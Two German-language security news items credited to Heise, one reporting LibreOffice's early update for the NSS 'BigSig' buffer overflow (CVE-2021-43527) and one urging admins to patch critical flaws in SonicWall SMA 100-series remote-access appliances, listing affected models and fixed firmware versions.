Die quelloffene Bürosoftware-Suite LibreOffice nutzt Mozillas NSS-Kryptografie-Bibliothek, die unter anderem die Transport Layer Security (TLS) umsetzt. Eine kürzlich entdeckte kritische Sicherheitslücke darin könnten Angreifer zum Ausführen von eingeschmuggelten Schadcode nutzen. Das könnte auch in LibreOffice gelingen. Mit aktualisierten Installationspaketen dichtet das Projekt die Sicherheitslücken ab. Eigentlich planten die LibreOffice-Entwickler, die nächsten Software-Versionen im Januar freizugeben. Aufgrund der Gefahr durch die Schwachstelle haben sie das Update nun jedoch vorgezogen. Die vom Entdecker Tavis Ormandy „BigSig“ getaufte Schwachstelle tat sich auf, da die NSS-Bibliothek beim Kopieren bestimmter Zertifikate nicht prüfte, ob der Zielpuffer groß genug war. DSA- und RSA-PSS-Signaturen größer als 16384 Bit überschrieben somit die dahinter liegenden Speicherbereiche mit Inhalten, die der Angreifer kontrolliert. Die Umleitung von Funktionszeigern, um derart eingeschleusten Code auszuführen, beschreibt Ormandy zudem als „trivial“. Die fehlerbereinigten Versionen LibreOffice 7.2.4 sowie 7.1.8 stehen jetzt zum Download bereit. Das LibreOffice-Projekt schreibt in einem Blog-Beitrag, dass es allen Nutzern empfehle, die Software zu aktualisieren. Mozilla hat ein eigenes Sicherheits-Advisory für die NSS-Lücke CVE-2021-43527veröffentlicht. Demnach ist zumindest Firefox nicht betroffen, weil es für die Zertifikatsprüfung die Bibliothek mozilla::pkix einsetzt. Andere Programme wie Thunderbird, Evince und Evolution sind hingegen wahrscheinlich anfällig, wenn sie eine verwundbare NSS-Bibliothek benutzen. Die Versionen NSS 3.73 und NSS ESR 3.68.1 beseitigen den Fehler und damit auch die Schwachstelle. Ein Update der jeweiligen Software ist jedoch nicht zwingend erforderlich; sofern sie keine eigene NSS-Version mitbringt, genügt ein systemweites Update des NSS-Pakets.

Quelle: Heise

Jetzt patchen! Root-Lücke in Fernzugrifflösung SMA 100 von Sonicwall

Admins, die den Fernzugriff auf Unternehmen über Sonicwalls Secure-Mobile-Access-Systeme (SMA) realisieren, sollten die Appliances zügig auf den aktuellen Stand bringen. Andernfalls könnten Angreifer Systeme attackieren. Über SMA greifen Mitarbeiter mit ihren Geräten über das Internet auf Firmen-Ressourcen zu. Eroflgreiche Attacken könnten Angreifer demzufolge den Weg ins Netzwerk ebnen. In einer Warnmeldung führt der Hersteller von Netzwerkequipment aus, dass die SMA Applainces SMA 100, 200, 210, 400, 410 und 500v verwundbar sind. Das soll auch der Fall sein, wenn eine Firewall aktiviert ist. Insgesamt haben die Entwickler eigenen Angaben zufolge acht Sicherheitslücken in aktuellen Firmware-Versionen geschlossen. Zwei Lücken (CVE-2021-20038, CVE-2021-20045) gelten als „kritisch“. Die Fehlerbeschreibungen klingen so, als könnten Angreifer ohne Authentifizierung Schadcode ausführen. Durch das erfolgreiche Ausnutzen einer weiteren Schwachstelle (CVE-2021-20039 „hoch“) sollen authentifizierte Angreifer Befehle mit Root-Rechten ausführen können. Sonicwall versichert, dass sie bislang keine Attacken beobachtet haben. Die folgenden Firmware-Versionen sollen gegen die Angriffe gerüstet sein:

  • 10.2.1.3-27sv
  • 10.2.0.9-41sv

Alle vorigen Ausgaben sollen verwundbar sein. Der Support für 9.0.0 ist Ende Oktober 2021 ausgelaufen. Hier ist ein Upgrade auf 10.2.x fällig, damit auch in Zukunft Sicherheitsupdates installiert werden können.

Quelle: Heise